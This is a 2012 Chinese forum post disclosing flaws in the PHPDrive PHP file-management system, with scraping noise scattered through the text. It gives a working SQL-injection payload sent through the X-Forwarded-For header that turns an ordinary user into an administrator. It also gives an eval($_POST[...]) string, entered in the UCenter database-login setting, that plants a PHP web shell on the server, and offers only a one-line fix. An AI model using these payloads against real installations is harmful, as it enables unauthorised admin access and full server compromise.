PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
# n. b# u/ `0 O7 Y2 _# ~" n: G7 d0 W+ l$ [& \
includes/user.lib.php/ r/ r, u% |6 {
行87% ] E& I j, O- L# T& ]
function get_ip() {
2 t. u# o' @8 L% X1 D0 I/ R if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
8 N' I9 l, q4 r: K在用户注册与登录 处module/disk/account.lead.php2 d7 b, O \2 _2 z
198行
/ {) I2 W) G( t; n0 U9 u7 N' V //更新本次登录IP和时间/ y* y8 a8 m, m6 Y. |
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生; T2 z+ D2 V7 V. J
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限) K" b$ T6 B+ H
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.6 D; u$ D* b7 s* s' n
后台getshell:
) o7 M' R9 b' k7 C P在UCenter设置处,将UC数据库登录名填写为1 t# O4 N2 {4 q& }4 ^
* q6 Q! Z8 x, f f& f! D* |root’);eval($_POST[DisKill]);?>/*/ E" \ B6 x" k$ K( w; \+ ?+ ^( _
可以得到一个shell,位置在 data/uc.data.php2 o0 o. e$ J2 s- w2 l) m
% a N/ `! I; {/ |; S/ ?
修复:过滤注入. g' p9 F; Z: o$ P Z* l/ z- Y# W# w
+ R0 ^ i) h7 \
|
发表于 2012-12-31 09:18:34
收藏
支持
反对